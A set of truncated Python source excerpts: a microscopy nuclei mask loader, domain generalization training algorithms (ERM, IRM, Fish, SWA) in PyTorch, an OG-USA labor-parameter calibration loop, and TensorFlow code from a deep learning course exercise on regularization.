img_files = glob.glob(file_pattern)
img_files.sort()
#for i in range(0,img_files.__len__()):
for i in img_range:
self.mask_path.append(os.path.join(folder, self.mask_prefix + str(i) + self.mask_postfix))
#self.mask_path.append(os.path.join(folder, "Mask_" + str(i) + ".tif"))
def image_reference(self, image_id):
"""Return the shapes data of the image."""
info = self.image_info[image_id]
if info["source"] == "shapes":
return info["shapes"]
else:
super(self.__class__).image_reference(self, image_id)
def load_mask(self, image_id):
"""Generate instance masks for shapes of the given image ID.
"""
info = self.image_info[image_id]
mask = tifffile.imread(self.mask_path[self.ids[image_id]])
if np.unique(mask).__len__() > 1:
count = np.unique(mask).__len__()-1 # one less because of 0
mask_new = np.zeros([info['height'], info['width'], count], dtype=np.uint8) # one more for background
running = 0
for i in np.unique(mask): #range(1, count):
if ((i > 0) & ((mask == i).sum() > 0)):
mask_new[:, :, running] = (mask == i)
running = running + 1
# Map class names to class IDs.
class_ids = np.ones(count)
else:
mask_new = np.zeros([info['height'], info['width'], 1], dtype=np.uint8)
class_ids = np.zeros([1])
return mask_new, class_ids.astype(np.int32)
def load_mask_one_layer(self, image_id,relabel=False):
mask = tifffile.imread(self.mask_path[self.ids[image_id]])
if (mask.ndim > 2):
mask = mask[:,:,0]
if (relabel):
mask_tmp = np.zeros((mask.shape[0],mask.shape[1]))
running=1
for i in np.unique(mask):
if i > 0:
mask_tmp = mask_tmp + running * (mask==i)
running = running + 1
mask = mask_tmp.astype(np.float)
return mask #mask.astype(np.float)
def pre_process_img(self, img, color):
"""
Preprocess image
"""
if color is 'gray':
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
elif color is 'rgb':
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
else:
pass
img = img.astype(np.float32)
img /= 255.0
return img
def split_train_test(self,width=256, height=256):
dataset_train = ArtificialNucleiDataset()
dataset_test = ArtificialNucleiDataset()
dataset_train.image_path = []
dataset_train.mask_path = | |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from backpack import extensions
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.autograd as autograd
from torch.autograd import Variable
import random
from statistics import mean
import math
import copy
import numpy as np
from collections import defaultdict, OrderedDict
import itertools
from domainbed import networks
from domainbed.lib import misc, diversity_metrics, diversity, torchutils, sam, sammav
from domainbed.lib.lff import EMA, GeneralizedCELoss
try:
from torchmetrics import Precision, Recall
except:
Precision, Recall = None, None
from backpack import backpack, extend
from backpack.extensions import BatchGrad
ALGORITHMS = [
"ERM",
"Fish",
"IRM",
# "IRMAdv",
# "GroupDRO",
# "Mixup",
# "MLDG",
# "CORAL",
# "COREL",
# "MMD",
# "DANN",
# "CDANN",
# "MTL",
# "SagNet",
# "ARM",
# "VREx",
# "VRExema",
# "RSC",
# "SD",
# "ANDMask",
# "SANDMask",
# "IGA",
# "SelfReg",
# "FisherMMD",
# "LFF",
# "KernelDiversity",
# "EnsembleKernelDiversity",
"Fishr",
"Ensembling",
]
def get_algorithm_class(algorithm_name):
"""Return the algorithm class with the given name."""
if algorithm_name not in globals():
raise NotImplementedError("Algorithm not found: {}".format(algorithm_name))
return globals()[algorithm_name]
class Algorithm(torch.nn.Module):
"""
A subclass of Algorithm implements a domain generalization algorithm.
Subclasses should implement the following:
- update()
- predict()
"""
CUSTOM_FORWARD = False
def __init__(self, input_shape, num_classes, num_domains, hparams):
super(Algorithm, self).__init__()
self.input_shape = input_shape
self.num_classes = num_classes
self.hparams = hparams
self.num_domains = num_domains
def update(self, minibatches, unlabeled=None):
"""
Perform one update step, given a list of (x, y) tuples for all
environments.
Admits an optional list of unlabeled minibatches from the test domains,
when task is domain_adaptation.
"""
raise NotImplementedError
def predict(self, x):
raise NotImplementedError
def get_tb_dict(self):
return {}
class ERM(Algorithm):
"""
Empirical Risk Minimization (ERM)
"""
def __init__(self, input_shape, num_classes, num_domains, hparams):
super(ERM, self).__init__(input_shape, num_classes, num_domains, hparams)
self.featurizer = networks.Featurizer(input_shape, self.hparams)
self.classifier = networks.Classifier(
self.featurizer.n_outputs, num_classes, self.hparams['nonlinear_classifier']
)
self.network = nn.Sequential(self.featurizer, self.classifier)
self._init_mav()
self._init_optimizer()
def _init_mav(self):
if self.hparams['mav']:
self.mav = misc.MovingAvg(self.network)
else:
self.mav = None
def _init_optimizer(self):
if self.hparams.get('sam'):
phosam = 10 * self.hparams["phosam"] if self.hparams["samadapt"] else self.hparams[
"phosam"]
if self.hparams.get('sam') == "inv":
phosam = - phosam
if self.hparams.get('sam') == "onlymav":
self.optimizer = sammav.SAMMAV(
self.network.parameters(),
params_mav=self.mav.network_mav.parameters(),
base_optimizer=torch.optim.Adam,
adaptive=self.hparams["samadapt"],
rho=phosam,
lr=self.hparams["lr"],
weight_decay=self.hparams["weight_decay"],
)
else:
self.optimizer = sam.SAM(
self.network.parameters(),
torch.optim.Adam,
adaptive=self.hparams["samadapt"],
rho=phosam,
lr=self.hparams["lr"],
weight_decay=self.hparams["weight_decay"],
)
else:
self.optimizer = torch.optim.Adam(
self.network.parameters(),
lr=self.hparams["lr"],
weight_decay=self.hparams["weight_decay"],
)
def update(self, minibatches, unlabeled=None):
all_x = torch.cat([x for x, y in minibatches])
all_classes = torch.cat([y for x, y in minibatches])
if self.hparams['sam'] == "perdomain":
domain = random.randint(0, self.num_domains - 1)
loss = F.cross_entropy(self.network(minibatches[domain][0]), minibatches[domain][1])
elif self.hparams['sam'] == "mav":
predictions = self.network(all_x)
with torch.no_grad():
predictions_mav = self.mav.network_mav(all_x)
loss = F.cross_entropy((predictions + predictions_mav) / 2, all_classes)
elif self.hparams['sam'] == "mavsam":
predictions = self.network(all_x)
with torch.no_grad():
predictions_mav = self.mav.network_mav(all_x)
loss = (1 + self.hparams['mavsamcoeff']) * F.cross_entropy(
(predictions + self.hparams['mavsamcoeff'] * predictions_mav) /
(1 + self.hparams['mavsamcoeff']), all_classes
)
elif self.hparams['sam'] == "onlymav":
loss = F.cross_entropy(self.mav.network_mav(all_x), all_classes)
else:
loss = F.cross_entropy(self.network(all_x), all_classes)
output_dict = {'loss': loss}
if self.hparams['sam']:
self.optimizer.zero_grad()
# first forward-backward pass
loss.backward()
self.optimizer.first_step(zero_grad=True)
# second forward-backward pass
loss_second_step = F.cross_entropy(self.network(all_x), all_classes)
# make sure to do a full forward pass
loss_second_step.backward()
self.optimizer.second_step()
output_dict["loss_secondstep"] = loss_second_step
else:
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if self.hparams['mav']:
self.mav.update()
return {key: value.item() for key, value in output_dict.items()}
def predict(self, x):
preds_network = self.network(x)
if self.hparams['mav']:
preds_mav = self.mav.network_mav(x)
results = {"mav": preds_mav, "net": preds_network}
else:
results = {"net": preds_network}
return results
def eval(self):
Algorithm.eval(self)
if self.hparams['mav']:
self.mav.network_mav.eval()
def train(self, *args):
Algorithm.train(self, *args)
if self.hparams['mav']:
self.mav.network_mav.train(*args)
def accuracy(self, loader, device):
self.eval()
batch_classes = []
dict_stats = {}
with torch.no_grad():
for batch in loader:
x, y = batch
x = x.to(device)
dict_logits = self.predict(x)
y = y.to(device)
batch_classes.append(y)
for key in dict_logits.keys():
if key not in dict_stats:
dict_stats[key] = {"preds": [], "confs": [], "correct": []}
logits = dict_logits[key]
try:
preds = logits.argmax(1)
except:
import pdb
pdb.set_trace()
dict_stats[key]["preds"].append(preds.cpu())
dict_stats[key]["confs"].append(logits.max(1)[0].cpu())
dict_stats[key]["correct"].append(preds.eq(y).float().cpu())
for key0 in dict_stats:
for key1 in dict_stats[key0]:
dict_stats[key0][key1] = torch.cat(dict_stats[key0][key1])
results = {}
for key in dict_stats:
results[f"Accuracies/acc_{key}"] = sum(dict_stats[key]["correct"].numpy()
) / len(dict_stats[key]["correct"].numpy())
results[f"Calibration/ece_{key}"] = misc.get_ece(
dict_stats[key]["confs"].numpy(), dict_stats[key]["correct"].numpy()
)
for regex in ["mavnet", "mavnet0", "mav01", "net01"]:
if regex == "mavnet":
key0 = "mav"
key1 = "net"
elif regex == "mavnet0":
key0 = "mav0"
key1 = "net0"
elif regex == "mav01":
key0 = "mav0"
key1 = "mav1"
elif regex == "net01":
key0 = "net0"
key1 = "net1"
else:
raise ValueError(regex)
if key0 not in dict_stats:
continue
assert key1 in dict_stats
targets = torch.cat(batch_classes).cpu().numpy()
preds0 = dict_stats[key0]["preds"].cpu().numpy()
preds1 = dict_stats[key1]["preds"].cpu().numpy()
results[f"Diversity/{regex}ratio"] = diversity_metrics.ratio_errors(
targets, preds0, preds1
)
results[f"Diversity/{regex}agre"] = diversity_metrics.agreement_measure(
targets, preds0, preds1
)
# results[f"Diversity/{regex}doublefault"] = diversity_metrics.double_fault(targets, preds0, preds1)
# results[f"Diversity/{regex}singlefault"] = diversity_metrics.single_fault(targets, preds0, preds1)
results[f"Diversity/{regex}qstat"] = diversity_metrics.Q_statistic(
targets, preds0, preds1
)
self.train()
return results
class SWA(ERM):
def __init__(self, input_shape, num_classes, num_domains, hparams):
ERM.__init__(self, input_shape, num_classes, num_domains, hparams)
# diversifier
self.features_size = self.featurizer.n_outputs
self.register_buffer("update_count", torch.tensor([0]))
self.hparams["num_members"] = 2
if self.hparams["diversity_loss"] in [None, "none"]:
self.member_diversifier = None
else:
self.member_diversifier = diversity.DICT_NAME_TO_DIVERSIFIER[
self.hparams["diversity_loss"]]
if not isinstance(self.member_diversifier, str):
self.member_diversifier = self.member_diversifier(
hparams=self.hparams,
features_size=self.features_size,
num_classes=self.num_classes,
num_domains=num_domains
)
def update(self, minibatches, unlabeled=None):
bsize = minibatches[0][0].size(0)
all_x = torch.cat([x for x, y in minibatches])
all_classes = torch.cat([y for x, y in minibatches])
all_features = self.featurizer(all_x)
all_logits = self.classifier(all_features)
all_loss = F.cross_entropy(all_logits, all_classes, reduction="none")
output_dict = {'lossmean': all_loss.mean()}
penalty_active = self.update_count >= self.hparams["penalty_anneal_iters"]
if self.update_count == self.hparams["penalty_anneal_iters"] != 0:
# Reset Adam as in IRM or V-REx, because it may not like the sharp jump in
# gradient magnitudes that happens at this step.
self._init_optimizer()
self.update_count += 1
if self.hparams["diversity_loss"] == "sampling":
assert self.hparams.get("groupdro_eta") != 0
if self.member_diversifier is not None:
with torch.no_grad():
mav_features = self.mav.get_featurizer()(all_x)
mav_logits = self.mav.get_classifier()(all_features)
mav_loss = F.cross_entropy(mav_logits, all_classes, reduction="none")
if self.member_diversifier.diversity_type == "sampling":
loss_weighted = self.member_diversifier.compute_weighted_loss(
active_loss=all_loss, sampling_loss=mav_loss
)
output_dict["lossw"] = loss_weighted
if penalty_active:
objective = loss_weighted
else:
objective = all_loss.mean()
else:
kwargs = {
"features_per_member":
torch.stack([all_features, mav_features],
dim=0).reshape(2, self.num_domains, bsize, self.features_size),
"logits_per_member":
torch.stack([all_logits, mav_logits],
dim=0).reshape(2, self.num_domains, bsize, self.num_classes),
"classes":
all_classes,
"nlls_per_member":
torch.stack([all_loss, mav_loss], dim=0).reshape(2, self.num_domains, bsize),
# "classifiers": [self.classifier, self.mav.get_classifier()]
}
dict_diversity = self.member_diversifier.forward(**kwargs)
output_dict.update(dict_diversity)
if penalty_active:
objective = all_loss.mean() + dict_diversity["loss_div"] * self.hparams["lambda_diversity_loss"]
else:
objective = all_loss.mean()
else:
objective = all_loss.mean()
self.optimizer.zero_grad()
objective.backward()
self.optimizer.step()
if self.hparams['mav']:
self.mav.update()
return {key: value.item() for key, value in output_dict.items()}
class IRM(ERM):
"""Invariant Risk Minimization"""
def __init__(self, input_shape, num_classes, num_domains, hparams):
super(IRM, self).__init__(input_shape, num_classes, num_domains, hparams)
self.register_buffer("update_count", torch.tensor([0]))
@staticmethod
def _irm_penalty(logits, y):
device = "cuda" if logits[0][0].is_cuda else "cpu"
scale = torch.tensor(1.0).to(device).requires_grad_()
loss_1 = F.cross_entropy(logits[::2] * scale, y[::2])
loss_2 = F.cross_entropy(logits[1::2] * scale, y[1::2])
grad_1 = autograd.grad(loss_1, [scale], create_graph=True)[0]
grad_2 = autograd.grad(loss_2, [scale], create_graph=True)[0]
result = torch.sum(grad_1 * grad_2)
return result
def update(self, minibatches, unlabeled=None):
device = "cuda" if minibatches[0][0].is_cuda else "cpu"
penalty_weight = (
self.hparams["irm_lambda"]
if self.update_count >= self.hparams["irm_penalty_anneal_iters"] else 1.0
)
nll = 0.0
penalty = 0.0
all_x = torch.cat([x for x, y in minibatches])
all_logits = self.network(all_x)
all_logits_idx = 0
for i, (x, y) in enumerate(minibatches):
logits = all_logits[all_logits_idx:all_logits_idx + x.shape[0]]
all_logits_idx += x.shape[0]
nll += F.cross_entropy(logits, y)
penalty += self._irm_penalty(logits, y)
nll /= len(minibatches)
penalty /= len(minibatches)
loss = nll + (penalty_weight * penalty)
if self.update_count == self.hparams["irm_penalty_anneal_iters"]:
# Reset Adam, because it doesn't like the sharp jump in gradient
# magnitudes that happens at this step.
self.optimizer = torch.optim.Adam(
self.network.parameters(),
lr=self.hparams["lr"],
weight_decay=self.hparams["weight_decay"],
)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
self.update_count += 1
return {"loss": loss.item(), "nll": nll.item(), "penalty": penalty.item()}
class Fish(ERM):
"""
Implementation of Fish, as seen in Gradient Matching for Domain
Generalization, Shi et al. 2021.
"""
def __init__(self, input_shape, num_classes, num_domains, hparams):
super(Fish, self).__init__(input_shape, num_classes, num_domains, hparams)
Algorithm.__init__(self, input_shape, num_classes, num_domains, hparams)
self.network = networks.WholeFish(input_shape, num_classes, hparams)
self._init_optimizer()
self.optimizer_inner_state = None
self._init_mav()
def create_clone(self, device):
self.network_inner = networks.WholeFish(
self.input_shape, self.num_classes, self.hparams, weights=self.network.state_dict()
).to(device)
self.optimizer_inner = torch.optim.Adam(
self.network_inner.parameters(),
lr=self.hparams["lr"],
weight_decay=self.hparams["weight_decay"],
)
if self.optimizer_inner_state is not None:
self.optimizer_inner.load_state_dict(self.optimizer_inner_state)
def fish(self, meta_weights, inner_weights, lr_meta):
meta_weights = misc.ParamDict(meta_weights)
inner_weights = misc.ParamDict(inner_weights)
meta_weights += lr_meta * (inner_weights - meta_weights)
return meta_weights
def update(self, minibatches, unlabeled=None):
self.create_clone(minibatches[0][0].device)
for x, y in minibatches:
loss = F.cross_entropy(self.network_inner(x), y)
self.optimizer_inner.zero_grad()
loss.backward()
self.optimizer_inner.step()
self.optimizer_inner_state = self.optimizer_inner.state_dict()
meta_weights = self.fish(
meta_weights=self.network.state_dict(),
inner_weights=self.network_inner.state_dict(),
lr_meta=self.hparams["meta_lr"],
)
self.network.reset_weights(meta_weights)
if self.hparams['mav']:
self.mav.update()
return {"loss": loss.item()}
class FishrDomainMatcher():
def __init__(self, hparams, optimizer, num_domains):
self.hparams = hparams
self.optimizer = optimizer
self.num_domains = num_domains
self.loss_extended | |
'''
AUTHORS: <NAME> and <NAME>
DATE: March 22, 2019
COPYRIGHT MARCH 22, 2019 <NAME> AND <NAME>
'''
from __future__ import print_function
'''
This module should be organized as follows:
Main function:
chi_estimate() = returns chi_n, chi_b
- calls:
wealth.get_wealth_data() - returns data moments on wealth distribution
labor.labor_data_moments() - returns data moments on labor supply
minstat() - returns min of statistical objective function
model_moments() - returns model moments
SS.run_SS() - return SS distributions
'''
'''
------------------------------------------------------------------------
Last updated: 7/27/2016
Uses a simulated method of moments to calibrate the chi_n adn chi_b
parameters of OG-USA.
This py-file calls the following other file(s):
wealth.get_wealth_data()
labor.labor_data_moments()
SS.run_SS
This py-file creates the following other file(s): None
------------------------------------------------------------------------
'''
import numpy as np
import scipy.optimize as opt
import scipy.interpolate as si
import pandas as pd
import os
try:
import cPickle as pickle
except ImportError:
import pickle
from . import wealth
from . import labor
from . import SS
from . import utils
from ogusa import aggregates as aggr
from ogusa import SS
def chi_n_func(s, a0, a1, a2, a3, a4):
chi_n = a0 + a1 * s + a2 * s ** 2 + a3 * s ** 3 + a4 * s ** 4
return chi_n
def chebyshev_func(x, a0, a1, a2, a3, a4):
func = np.polynomial.chebyshev.chebval(x, [a0, a1, a2, a3, a4])
return func
def find_moments(p, client):
b_guess = np.ones((p.S, p.J)) * 0.07
n_guess = np.ones((p.S, p.J)) * .4 * p.ltilde
rguess = 0.08961277823002804 # 0.09
T_Hguess = 0.12
factorguess = 12.73047710050195 # 7.7 #70000 # Modified
BQguess = aggr.get_BQ(rguess, b_guess, None, p, 'SS', False)
exit_early = [0, -1] # 2nd value gives number of valid labor moments to consider before exiting SS_fsolve
# Put -1 to run to SS
ss_params_baseline = (b_guess, n_guess, None, None, p, client, exit_early)
guesses = [rguess] + list(BQguess) + [T_Hguess, factorguess]
[solutions_fsolve, infodict, ier, message] =\
opt.fsolve(SS.SS_fsolve, guesses, args=ss_params_baseline,
xtol=p.mindist_SS, full_output=True)
rss = solutions_fsolve[0]
BQss = solutions_fsolve[1:-2]
T_Hss = solutions_fsolve[-2]
factor_ss = solutions_fsolve[-1]
Yss = T_Hss/p.alpha_T[-1]
fsolve_flag = True
try:
output = SS.SS_solver(b_guess, n_guess, rss, BQss, T_Hss,
factor_ss, Yss, p, client, fsolve_flag)
except:
print('RuntimeError: Steady state aggregate resource constraint not satisfied')
print('Luckily we caught the error, so minstat_init_calibrate will continue')
return 1e10
model_moments = np.array(output['nssmat'].mean(axis=1)[:45]) # calc_moments(output, p.omega_SS, p.lambdas, p.S, p.J)
return model_moments
def chi_estimate(p, client=None):
'''
COPYRIGHT MARCH 22, 2019 <NAME> AND <NAME>
'''
# Generate labor data moments
labor_hours = np.array([167, 165, 165, 165, 165, 166, 165, 165, 164])#, 166, 164])
labor_part_rate = np.array([0.69, 0.849, 0.849, 0.847, 0.847, 0.859, 0.859, 0.709, 0.709])#, 0.212, 0.212])
employ_rate = np.array([0.937, 0.954, 0.954, 0.966, 0.966, 0.97, 0.97, 0.968, 0.968])#, 0.978, 0.978])
labor_hours_adj = labor_hours * labor_part_rate * employ_rate
labor_moments = labor_hours_adj * 12 / (365 * 17.5)
data_moments_trunc = np.array(list(labor_moments.flatten()))
#ages = np.array([20, 25, 30, 35, 40, 45, 50, 55, 60]) + 2.5
#labor_fun = si.splrep(ages, data_moments_trunc)
#ages_full = np.linspace(21, 65, p.S // 2 + 5)
#data_moments = si.splev(ages_full, labor_fun)
data_moments = np.repeat(data_moments_trunc, 5) # Set labor values to equal average over bin
# a0 = 1.25108169e+03
# a1 = -1.19873316e+02
# a2 = 2.20570513e+00
# a3 = -1.76536132e-02
# a4 = 5.19262962e-05
# chi_n = np.ones(p.S)
# chi_n[:p.S // 2 + 5] = chebyshev_func(ages_full, a0, a1, a2, a3, a4)
# slope = chi_n[p.S // 2 + 5 - 1] - chi_n[p.S // 2 + 5 - 2]
# chi_n[p.S // 2 + 5 - 1:] = (np.linspace(65, 100, 36) - 65) * slope + chi_n[p.S // 2 + 5 - 1]
# chi_n[chi_n < 0.5] = 0.5
chi_n = pickle.load(open("chi_n.p", "rb"))
p.chi_n = chi_n
model_moments = find_moments(p, client)
labor_below = np.zeros(p.S // 2 + 5)
labor_above = np.ones(p.S // 2 + 5) * np.inf
chi_below = np.zeros(p.S // 2 + 5)
chi_above = np.zeros(p.S // 2 + 5)
chi_prev = np.zeros(p.S // 2 + 5)
consec_above = np.zeros(p.S // 2 + 5)
consec_below = np.zeros(p.S // 2 + 5)
print('About to start the while loop')
eps_val = 0.001
#still_calibrate = ((abs(model_moments - data_moments) > eps_val) & (chi_n[:45] > 0.5))\
# | ((chi_n[:45] <= 0.5) & (labor_above > data_moments))
still_calibrate = (abs(model_moments - data_moments) > eps_val) & ((chi_n[:45] > 0.5)\
| ((chi_n[:45] <= 0.5) & (labor_above > data_moments)))
moments_calibrated_per_step = []
while still_calibrate.any():
### Check that 2 consecutive chi_n estimates aren't equal
if (chi_n[:45] == chi_prev).all():
raise RuntimeError('Calibration failure. No chi_n values changed between guesses')
chi_prev = np.copy(chi_n[:45])
### Set above/below arrays based on model moments
above_data_below_above = (model_moments > data_moments) #& (model_moments < labor_above)
below_data_above_below = (model_moments < data_moments) #& (model_moments > labor_below)
# Had to comment out checking if closer than previous guess because if
# the result moves, the convex combination might be outside the range
# and it gets stuck in an infinite loop because the guess never improves
labor_above[above_data_below_above] = model_moments[above_data_below_above]
chi_above[above_data_below_above] = chi_n[:45][above_data_below_above]
labor_below[below_data_above_below] = model_moments[below_data_above_below]
chi_below[below_data_above_below] = chi_n[:45][below_data_above_below]
### Set consecutive above/below values
consec_above[above_data_below_above] += 1
consec_above[below_data_above_below] = 0
consec_below[below_data_above_below] += 1
consec_below[above_data_below_above] = 0
consec = (consec_above >= 4) | (consec_below >= 4)
### Create arrays for labor boundaries
print(str(np.sum(still_calibrate)) + ' labor moments are still being calibrated')
moments_calibrated_per_step.append(np.sum(still_calibrate))
print('Moments calibrated at each iteration (including this iteration):')
print(moments_calibrated_per_step)
both = (((labor_below > 0) & (labor_above < np.inf)) |\
((labor_below == 0) & (labor_above == np.inf))) & (still_calibrate)
above = (labor_below == 0) & (labor_above < np.inf) & (still_calibrate)
below = (labor_below > 0) & (labor_above == np.inf) & (still_calibrate)
print(str(np.sum(both)) + ' labor moments are being convexly shifted')
print(str(np.sum(above)) + ' labor moments are being shifted down')
print(str(np.sum(below)) + ' labor moments are being shifted up')
### Calculate convex combination factor
above_dist = abs(labor_above - data_moments)
below_dist = abs(data_moments - labor_below)
total_dist = above_dist + below_dist
above_factor = below_dist / total_dist
below_factor = above_dist / total_dist
#### Adjust by convex combination factor
chi_n[:45][both] = np.copy(below_factor[both] * chi_below[both] +\
above_factor[both] * chi_above[both])
invalid_factor = np.isnan(chi_n[:45][both]) # Modified
chi_n[:45][both][invalid_factor] = np.copy(0.5 * (chi_below[both][invalid_factor] + chi_above[both][invalid_factor])) # Modified
### Adjust values that aren't bounded both above and below by labor error factors
error_factor = model_moments / data_moments
chi_n[:45][above] = np.copy(np.minimum(error_factor[above] * chi_above[above], 1.02 * chi_above[above]))#np.copy(1.02 * chi_above[above])
chi_n[:45][below] = np.copy(np.maximum(error_factor[below] * chi_below[below], 0.98 * chi_below[below]))#np.copy(0.98 * chi_below[below])
### Solve moments using new chi_n guesses
p.chi_n = chi_n
model_moments = find_moments(p, client)
print('-------------------------------')
print('New model moments:')
print(list(model_moments))
print('Chi_n:')
print(list(chi_n))
print('-------------------------------')
print('Labor moment differences:')
print(model_moments[still_calibrate] - data_moments[still_calibrate])
print('-------------------------------')
### Redefine still_calibrate and both based on new model moments
still_calibrate = (abs(model_moments - data_moments) > eps_val) & ((chi_n[:45] > 0.5)\
| ((chi_n[:45] <= 0.5) & (labor_above > data_moments)))
both = (((labor_below > 0) & (labor_above < np.inf)) |\
((labor_below == 0) & (labor_above == np.inf))) & (still_calibrate)
print('Chi differences:')
print(chi_below[still_calibrate] - chi_above[still_calibrate])
print('-------------------------------')
print('Chi below:')
print(chi_below[still_calibrate])
print('-------------------------------')
print('Chi above:')
print(chi_above[still_calibrate])
print('-------------------------------')
print('Labor above:')
print(labor_above[still_calibrate])
print('-------------------------------')
print('Labor below:')
print(labor_below[still_calibrate])
print('-------------------------------')
### Fix stuck boundaries
#still_calibrate_stuck_1 = ((abs(model_moments - data_moments) > eps_val) & (chi_n[:45] > 0.5))\
#| ((chi_n[:45] <= 0.5) & (labor_above > data_moments))
#still_calibrate_stuck_2 = ((abs(model_moments - data_moments) > 10 * eps_val) & (chi_n[:45] > 0.5))\
#| ((chi_n[:45] <= 0.5) & (labor_above > data_moments))
#stuck_1 = ((chi_below - chi_above) < 10 * eps_val) & (still_calibrate_stuck_1)
#stuck_2 = ((chi_below - chi_above) < 1e3 * eps_val) & (still_calibrate_stuck_2)
#stuck = (stuck_1) | (stuck_2)
stuck = ((chi_below - chi_above) < 10) & (consec) & (both)
if (stuck).any():
consec_above[stuck] = 0
consec_below[stuck] = 0
check_above_stuck = (stuck) & (model_moments > data_moments)
check_below_stuck = (stuck) & (model_moments < data_moments)
print(str(np.sum(check_above_stuck)) + ' labor moments are being checked to see if they are too high')
print(str(np.sum(check_below_stuck)) + ' labor moments are being checked to see if they are too low')
### Make sure chi_n bounds are still valid
check_chi_n = chi_n.copy()
check_chi_n[:45][check_above_stuck] = np.copy(chi_below[check_above_stuck])
check_chi_n[:45][check_below_stuck] = np.copy(chi_above[check_below_stuck])
p.chi_n = check_chi_n
check_model_moments = find_moments(p, client)
above_stuck = (check_above_stuck) & (check_model_moments > data_moments)
below_stuck = (check_below_stuck) & (check_model_moments < data_moments)
print(str(np.sum(above_stuck)) + ' labor moments are being unstuck from being too high')
print(str(np.sum(below_stuck)) + ' labor moments are being unstuck from being too low')
total_stuck = str(np.sum(above_stuck) + np.sum(below_stuck))
moments_calibrated_per_step.append(str(np.sum(stuck)) + '(checked) ' + total_stuck | |
<filename>assignment_03_regularization.py<gh_stars>1-10
"""
Udacity Deep Learning course by Google.
Assignment #03: various regularization techniques.
"""
import os
import sys
import time
import logging
import argparse
from os.path import join
import numpy as np
import tensorflow as tf
from tensorflow.contrib.data import Dataset
from utils import *
from dnn_utils import *
from dataset_utils import *
logger = logging.getLogger(os.path.basename(__file__)) # pylint: disable=invalid-name
SUMMARY_FOLDER = './.summary'
SAVER_FOLDER = './.sessions'
def parse_args():
"""Parse command line args using argparse."""
parser = argparse.ArgumentParser()
parser.add_argument(
'--sanitized',
action='store_true',
help='Use sanitized version of the test and validation datasets',
)
return parser.parse_args()
def train_logistic_classifier(train_dataset, train_labels, test_dataset, test_labels, params):
"""Standard logistic classifier with no nonlinearity."""
batch_size = 128
learning_rate = params.get('learning_rate', 0.5)
reg_coeff = params.get('weight_decay', 0.00001)
graph = tf.Graph()
with graph.as_default():
tf_train_dataset = tf.placeholder(tf.float32, shape=(None, IMAGE_RES * IMAGE_RES))
tf_train_labels = tf.placeholder(tf.float32, shape=(None, NUM_CLASSES))
tf_test_dataset = tf.constant(test_dataset)
weights = tf.Variable(tf.truncated_normal([IMAGE_RES * IMAGE_RES, NUM_CLASSES]))
biases = tf.Variable(tf.zeros([NUM_CLASSES]))
logits = tf.matmul(tf_train_dataset, weights) + biases
unregularized_loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=tf_train_labels, logits=logits),
)
l2_loss = reg_coeff * l2(weights)
loss = unregularized_loss + l2_loss
optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss)
train_prediction = tf.nn.softmax(logits)
test_prediction = tf.nn.softmax(tf.matmul(tf_test_dataset, weights) + biases)
with tf.Session(graph=graph) as sess:
tf.global_variables_initializer().run()
for step in range(10001):
offset = (step * batch_size) % (train_labels.shape[0] - batch_size)
batch_data = train_dataset[offset:(offset + batch_size), :]
batch_labels = train_labels[offset:(offset + batch_size), :]
feed_dict = {tf_train_dataset: batch_data, tf_train_labels: batch_labels}
_, l, predictions = sess.run([optimizer, loss, train_prediction], feed_dict=feed_dict)
verbose = True
if step % 500 == 0:
if verbose:
logger.info('Batch loss at step %d is %f', step, l)
logger.info('Batch accuracy: %.1f%%', calc_accuracy(predictions, batch_labels))
test_accuracy = calc_accuracy(test_prediction.eval(), test_labels)
return test_accuracy
def train_perceptron(
train_dataset, train_labels, test_dataset, test_labels, reg_coeff
):
"""Basic MLP with one hidden layer and nonlinearity. Trying some regularization techniques."""
batch_size = 128
num_samples = train_dataset.shape[0]
graph = tf.Graph()
with graph.as_default():
tf.set_random_seed(52)
input_data = tf.placeholder(tf.float32, shape=(None, IMAGE_RES * IMAGE_RES))
input_labels = tf.placeholder(tf.float32, shape=(None, NUM_CLASSES))
dropout_keep_prob = tf.placeholder(tf.float32)
w_1 = tf.Variable(tf.truncated_normal([IMAGE_RES * IMAGE_RES, 1024]))
b_1 = tf.Variable(tf.zeros([1024]))
layer_1 = tf.nn.relu(tf.matmul(input_data, w_1) + b_1)
layer_1 = tf.nn.dropout(layer_1, dropout_keep_prob)
w_2 = tf.Variable(tf.truncated_normal([1024, NUM_CLASSES]))
b_2 = tf.Variable(tf.zeros(NUM_CLASSES))
logits = tf.matmul(layer_1, w_2) + b_2
unregularized_loss = tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits(labels=input_labels, logits=logits),
)
l2_loss = reg_coeff * (l2(w_1) + l2(w_2))
loss = unregularized_loss + l2_loss
optimizer = tf.train.GradientDescentOptimizer(0.5).minimize(loss)
prediction_op = tf.nn.softmax(logits)
with tf.Session(graph=graph) as sess:
tf.global_variables_initializer().run()
logger.info('Initialized')
for step in range(5001):
offset = (step * batch_size) % (num_samples - batch_size)
batch_data = train_dataset[offset:(offset + batch_size), :]
batch_labels = train_labels[offset:(offset + batch_size), :]
feed_dict = {input_data: batch_data, input_labels: batch_labels, dropout_keep_prob: 0.5}
_, l, predictions = sess.run([optimizer, loss, prediction_op], feed_dict=feed_dict)
if step % 500 == 0:
logger.info('Minibatch loss at step %d is %f', step, l)
logger.info('Minibatch accuracy: %.1f%%', calc_accuracy(predictions, batch_labels))
def evaluate(data, labels):
"""Calculate accuracy for dataset."""
predictions = sess.run(
prediction_op, feed_dict={input_data: data, dropout_keep_prob: 1.0}
)
return calc_accuracy(predictions, labels)
train_acc = evaluate(train_dataset, train_labels)
test_acc = evaluate(test_dataset, test_labels)
logger.info('Train accuracy: %.1f%%', train_acc)
logger.info('Test accuracy: %.1f%%', test_acc)
def train_better(
train_dataset, train_labels, test_dataset, test_labels, reg_coeff=0.000005
):
"""
Trying more regularization stuff and a different optimizer.
This one is able to achieve 90.8% on unsanitized testing dataset with just one hidden layer.
"""
batch_size = 128
num_samples = train_dataset.shape[0]
graph = tf.Graph()
with graph.as_default():
tf.set_random_seed(52)
input_data = tf.placeholder(tf.float32, shape=(None, IMAGE_RES * IMAGE_RES))
